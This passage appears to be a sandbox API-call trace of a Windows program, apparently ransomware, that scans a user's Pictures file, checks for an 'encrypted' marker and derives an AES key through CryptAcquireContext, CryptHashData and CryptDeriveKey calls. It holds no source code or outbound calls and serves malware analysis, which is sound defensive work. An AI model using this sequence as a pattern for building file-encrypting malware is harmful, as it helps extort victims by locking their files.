lpString1="HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.545] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.545] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.545] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.545] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x34056510, ftLastWriteTime.dwHighDateTime=0x1d5bd80, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0x7c2240 [0040.546] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.546] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.546] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.546] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.546] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.546] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.546] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.547] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.548] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.548] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.548] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.548] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.549] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.549] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.549] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.549] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.549] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.549] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.550] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.550] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.550] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.550] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.550] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.550] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.551] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0040.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.570] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.571] 